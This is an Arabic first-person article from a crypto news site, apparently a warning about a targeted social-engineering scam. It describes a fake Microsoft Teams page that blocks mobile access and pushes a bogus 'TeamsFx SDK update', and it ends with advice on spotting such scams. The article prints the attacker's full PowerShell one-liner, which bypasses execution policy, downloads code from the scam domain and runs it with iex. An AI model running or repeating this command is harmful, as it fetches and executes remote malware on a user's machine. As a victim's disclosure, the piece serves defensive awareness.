أفضل المعلومات حول العملات الرقمية تصلك مباشرة إلى بريدك الإلكتروني.
كادت أن أتعرض للاختراق أثناء مكالمة عبر مايكروسوفت تيمز - إليكم كيف تتم عملية الاحتيال
كارنيكا إي. ياشوانت
دعوني أخبركم كيف كدتُ أن أصبح ضحية لعملية هندسة اجتماعية معقدة مصممة لاستغلال شيء روتيني وغير ضار ظاهريًا مثل مكالمة مايكروسوفت تيمز في وقت سابق من اليوم.
خلال معظم التفاعل، لم يبدُ أي شيء غير عادي.
تواصل معي شخص اعتقدت أنه جهة اتصال في المجال لترتيب اجتماع على برنامج مايكروسوفت تيمز، وكنت سعيدًا للغاية بالانضمام إلى المكالمة بدافع التعاون.
تنبيه: الشخص الذي كان على الطرف الآخر كان منتحلاً لشخصيتي، وحاول أن يجعلني أقوم بتشغيل برامج ضارة على جهاز الكمبيوتر الخاص بي.
أروي التجربة بأكملها هنا كتحذير للأصدقاء والمعارف والزملاء في مجتمع العملات المشفرة و Web3.
كنتُ أنا من كاد أن يكون اليوم؛ لكن قد يكون شخصاً آخر غداً.
الخطوة الأولى: الإعداد - "دعنا نتواصل، يا صديقي القديم"
عندما تتلقى رسالة نصية من حساب Telegram لشخص تعرفه كموظف بارز في وكالة علاقات عامة معروفة في مجال العملات المشفرة، فإن آخر شيء يخطر ببالك هو أنك تقع ضحية لعملية تصيد احتيالي.
لم تكن أي من العلامات التحذيرية المعتادة واضحة على الفور أيضاً.
لم تكن هذه رسالة خاصة عشوائية.
لم أكن أتحدث إلى حساب منتحل للشخصية حيث يتم استبدال حرف "i" بحرف "l" بشكل خفي
كان لديّ سجل محادثات مع الحساب أيضاً، لذلك اعتقدت أنني أتحدث مع الشخص الحقيقي على الطرف الآخر.
لم يكن هناك ما يثير الريبة منذ أن بدآ محادثة ودية لإعادة التواصل. وبعد فترة وجيزة، وصلهما رابط من تطبيق Calendly لحجز اجتماع مدته 30 دقيقة، ودعوة لحضور مكالمة عبر Microsoft Teams.
كما ذكرت سابقاً، لم يساورني أي شك طوال فترة التعامل. لقد لمستُ نفس المستوى من الاحترافية والصبر الذي يتوقعه المرء من موظف رفيع المستوى في وكالة علاقات عامة مرموقة.
كل ما كنت أعرفه هو أنني قمت بجدولة اجتماع عبر برنامج Teams من صفحة Calendly الخاصة بأحد جهات الاتصال في المجال.
يبدأ المحتال عملية الاتصال باستخدام حساب مخترق، ويرسل رابط اجتماع عبر برنامج Teams.
الخطوة الثانية: فخ "الانضمام عبر سطح المكتب فقط"
جاء يوم الاجتماع، وضغطتُ على رابط اجتماع Teams على هاتفي كما فعلتُ آلاف المرات من قبل. لكن لم يتم الدخول إلى الاجتماع مباشرةً كالمعتاد. فبدلاً من إعادة توجيهي إلى المكالمة، ظهرت شاشة تُفيد بأن "الوصول إلى هذا الاجتماع عبر الأجهزة المحمولة غير مسموح به بسبب إعدادات المُنظِّم"
"أوه لا! لم يحدث لي هذا من قبل."
حسنًا، لم يكن الأمر حادثًاdent أيضًا.
بالنظر إلى الماضي، ربما كانت تلك أول إشارة تحذيرية حقيقية.
شاشة الخطأ جزء من التصميم. يحتاج المحتالون إلى استخدامك لجهاز كمبيوتر مكتبي أو محمول لأن حمولتهم الخبيثة عبارة عن برنامج نصي يعمل عبر سطر الأوامر ولا يعمل إلا على أجهزة الكمبيوتر الشخصية.
عنوان URL الموجود في المتصفح "teams.livescalls.com" ليس نطاق مايكروسوفت الحقيقي.
تستخدم اجتماعات Teams الشرعية موقع teams.microsoft.com أو teams.live.com.
يبدو نطاق "livescalls.com" قريبًا بما يكفي من النطاق الحقيقي من بعيد، ولكن يا له من فرق شاسع بينه وبين النطاق الحقيقي إذا نظرت عن كثب.
أحدهما موقعٌ تسيطر عليه مايكروسوفت ويدّعي وجود أكثر من 320 مليون مستخدم نشط يوميًا. والآخر موقعٌ مزيفٌ تمامًا تسيطر عليه جهاتٌ معادية.
لإنصاف الأمر، قد تستخدم بعض المؤسسات نطاقات مخصصة لاجتماعات فرقها. مع ذلك، فإن خسارة أكثر من تريليون دولار أمريكي لصالح المحتالين في عام 2025، وفقًا للمنتدى الاقتصادي العالمي، كانت سببًا كافيًا لي لأتنبه إلى وجود مشكلة.
تمنع صفحة "إشعار الوصول إلى الفريق" المزيفة الوصول عبر الأجهزة المحمولة، مما يجبر الضحايا على استخدام جهاز كمبيوتر مكتبي حيث يمكن تشغيل البرنامج النصي الخبيث. لاحظ عنوان URL: teams.livescalls.com - وهو ليس نطاقًا تابعًا لشركة مايكروسوفت.
يضغط المحتال على الضحية للانضمام عبر جهاز الكمبيوتر بعد حظر الهاتف المحمول، مدعياً أن "الشركاء ينتظرون"
الخطوة 3: الحمولة — "قم بتحديث حزمة تطوير البرامج (SDK) الخاصة بـ TeamsFx"
بمجرد الدخول إلى سطح المكتب، عرض اجتماع Teams الوهمي صفحة مصممة باحترافية تشبه ما قد تراه في وثائق مايكروسوفت الرسمية. بل إنها تضمنت عبارات مايكروسوفت الحقيقية حول إيقاف دعم TeamsFx SDK بحلول سبتمبر 2025.
الحل؟ انسخ كتلة من التعليمات البرمجية وقم بتشغيلها في طرفية الأوامر أو موجه الأوامر.
إذا قمتَ بالبحث على جوجل، ستجد أن هناك حزمة تطوير برمجية (SDK) مشابهة. لكنك لستَ بحاجة إليها في مكالمة الفريق هذه.
يبدو الكود غير ضار في البداية، فهو يُعيّن متغيرات بيئية بأسماء تبدو رسمية مثل TeamsFx_API_KEY وMS_Teams_API_SECRET. لكنّ ثغرة الهجوم الحقيقية تكمن في مكان ما بينهما، وهؤلاء المهاجمون لا يعوّلون على اكتشافك للمشكلة
powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”
يتجاوز هذا السطر الواحد سياسات أمان PowerShell (-ep bypass)، ويقوم بتنزيل التعليمات البرمجية من خادم المهاجم، وينفذها على الفور (iex = Invoke-Expression).
وهكذا، يتم تثبيت أي برامج ضارة أو برامج تسجيل ضغطات المفاتيح أو أدوات الوصول عن بعد التي استضافها المهاجمون بصمت على جهازك.
واجهة اجتماع مزيفة لبرنامج Teams تعرض صفحة "تحديث حزمة تطوير البرامج TeamsFx" الخبيثة للمشاركين. لاحظ المشاركين في المكالمة - مقاطع فيديو مُولّدة بالذكاء الاصطناعي.
الخطوة الرابعة: مرحلة الضغط "لا تقلق، الأمر آمن"
عندما أعربت عن ترددي بشأن تشغيل البرنامج النصي، قام المحتال على الفور بتقديم مزيج من التطمين والضغط.
كان من المفترض أن تساعدني عبارة "لا تقلق، الأمر بسيط للغاية وآمن بالنسبة لك" على اتباع التعليمات الموجودة في لقطة الشاشة التي توضح لي كيفية فتح موجه الأوامر على جهاز الكمبيوتر الخاص بي.
كان من المفترض أن تجعلني عبارة "لقد انضم الشركاء بالفعل إلى Zoom" أشعر بالضغط لعدم اضطراري إلى جعل الجميع يغيرون المنصات لأنني لم أستطع معرفة كيفية تشغيل موجه الأوامر البسيط.
لم أشعر بالاطمئنان. ولم أتعرض للضغط أيضاً.
عندما اقترحتُ نقل المكالمة إلى جوجل ميت، رفضوا. يبدو أن حيلتهم لا تنجح إلا من خلال إعداد برنامج Teams المزيف الخاص بهم.
يرسل المحتال تعليمات خطوة بخطوة لتشغيل الكود الخبيث، مطمئناً الضحية: "لا تقلق، الأمر بسيط للغاية وآمن بالنسبة لك"
الخطوة الخامسة: تم كشف الخدعة - تم الحظر والحذف
تأكدت من شكوكي بعد فحص النص والنطاق: لقد كنت أتعرض للهندسة الاجتماعية وكنت على بعد خطوات قليلة من أن أصبح جزءًا من إحصائيات المنتدى الاقتصادي العالمي لعام 2026.
أخبرتُ المحتال مباشرةً: "لقد تحققتُ للتو، وهذا الأمر والموقع الإلكتروني غير موثوقين. للأسف، لن أتمكن من تنفيذه." وعرضتُ عليه مواصلة المحادثة عبر جوجل ميت إذا كان لا يزال يرغب في الدردشة.
"لكن الاجتماع مستمر الآن"، كانت هذه هي الرسالة من الطرف الآخر.
وكما توقعت، كان ردهم يهدف إلى تنبيهي إلى ضرورة الانضمام إلى المكالمة. ففي النهاية، لا أريد أن أجعل جميع هؤلاء الشركاء ينتظرون لفترة طويلة.
وبعد لحظات، قاموا بحذف جميع مراسلاتنا وحظروني.
آه... هذا ليس مجرد مؤشر خطر. بل هو أمرٌ مروع.
لا يقوم جهات الاتصال في مجال الأعمال بحذف سجل محادثاتهم بالكامل وحظرك بمجرد أن تشكك في تحديث برنامج ما.
بعد فضح عملية الاحتيال، يصر المهاجم على أن الاجتماع "جارٍ الآن" قبل حذف جميع الرسائل وحظر الضحية.
كيفية حماية نفسك
يتزايد هذا النوع من الهجمات في قطاعات العملات الرقمية، وتقنيات الويب، والتكنولوجيا بشكل ملحوظ. يقوم المحتالون باختراق أو انتحال حسابات حقيقية تعود لمتخصصي العلاقات العامة، والمستثمرين، وقادة المشاريع، لاستهداف شخصيات مرموقة. إليك كيفية حماية نفسك:
- لا تقم بتشغيل أي أوامر من صفحة الاجتماع. لن تطلب منك أي منصة مكالمات فيديو شرعية لصق أي كود في نافذة الأوامر أو موجه الأوامر.
- تحقق من عنوان URL. اجتماعات Microsoft Teams الحقيقية تُعقد مباشرةً على teams.microsoft.com أو teams.live.com - وليس على "teams.livescalls.com" أو أي نطاق مشابه آخر.
- كن حذراً من متطلبات "الاستخدام على أجهزة الكمبيوتر المكتبية فقط". إذا كان الاجتماع يمنع الوصول عبر الهاتف المحمول، فهذه حيلة متعمدة لإجبارك على استخدام جهاز يمكن من خلاله تنفيذ البرامج النصية.
- تحقق من هوية الشخص عبر قناة منفصلة. إذا أرسل لك أحد معارفك رابط اجتماع غير معتاد، فاتصل به مباشرةً أو راسله على منصة أخرى للتأكد.
- انتبه لعبارتي "powershell -ep bypass" و"iex". فهما من أبرز المؤشرات التحذيرية في أي برنامج نصي. الأولى تُعطّل الحماية، والثانية تُنفّذ التعليمات البرمجية المُنزّلة بشكل عشوائي.
- إذا كنت قد شغّلت البرنامج النصي بالفعل: افصل اتصالك بالإنترنت فورًا. قم بإجراء فحص كامل للبرامج الضارة (باستخدام Malwarebytes أو Windows Defender Offline). غيّر جميع كلمات المرور من جهاز آخر نظيف. راقب محافظ العملات الرقمية والحسابات المصرفية بحثًا عن أي معاملات غير مصرح بها.
لماذا يُعد هذا الأمر مهمًا بالنسبة للعملات المشفرة و Web3
لا أعتبر هذا تفاعلاً نموذجياً للتصيد الاحتيالي، حيث يقوم المهاجمون بإلقاء شباك واسعة ورؤية ما يجرونه إليها.
لا، لقد كانت عملية هندسة اجتماعية مُستهدفة استمرت لعدة أيام. تظاهر المهاجمون بأنهم من العاملين في نفس المجال لعدة أيام، وبنوا علاقة ودية معك، ثم قاموا بتوجيهك بشكل غير رسمي لحل مشكلة تقنية أثناء مكالمة Teams عبر صفحة مزيفة مُقنعة من مايكروسوفت.
سواء قاموا بسرقةdentاعتمادك، أو استنزاف محفظة العملات المشفرة الخاصة بك، أو تثبيت برامج ضارة للوصول عن بعد بشكل دائم، فإن المهاجمين لديهم كل شيء ليكسبوه ولا شيء ليخسروه.
إذا كنت مؤسسًا أو مستثمرًا أو أي شخص يعقد اجتماعات في مجال العملات الرقمية والتكنولوجيا، فشارك هذه المقالة مع فريقك. فالأشخاص الذين يديرون هذه عمليات الاحتيال يتطورون باستمرار، والوسيلة الوحيدة للوقاية هي الوعي.
قد يكون الحساب المنتحل في هذا الهجوم تابعًا لشخص حقيقي سُرقتdentأو تم اختراق حسابه. توثق هذه المقالة أسلوب الاحتيال، وليس هوية الشخص الذي استُخدمتdent. إذا كنت تعتقد أنdentتُستخدم في هجمات مماثلة، فاتصل بالسلطات المحلية وأبلغ شبكتك المهنية فورًا.
كارنيكا إي. ياشوانت
يُعدّ KEY كاتبًا غزير الإنتاج، ويُقدّم رؤيةً مُعمّقةً لمشاريع البلوك تشين والشركات الناشئة في مجال العملات الرقمية. كما يُشارك استراتيجيات تسويق المحتوى المُبتكرة المُستمدة من خبرته الإدارية التي تمتدّ على مدى 11 عامًا. يتمتّع KEY بتوازنٍ مثاليّ بين العقل والجسد، فهو يُشارك في سباقات الماراثون، ويُمارس الرماية، ويُمارس الرياضات الخطرة، ويقضي إجازاتٍ سنويةً في أكثر من 5 دول.
دورة
- أي العملات المشفرة يمكن أن تدر عليك المال
- كيفية تعزيز أمانك باستخدام المحفظة الإلكترونية (وأي منها يستحق الاستخدام فعلاً)
- استراتيجيات استثمارية غير معروفة يستخدمها المحترفون
- كيفية البدء في الاستثمار في العملات المشفرة (أي منصات التداول التي يجب استخدامها، وأفضل العملات المشفرة للشراء، إلخ)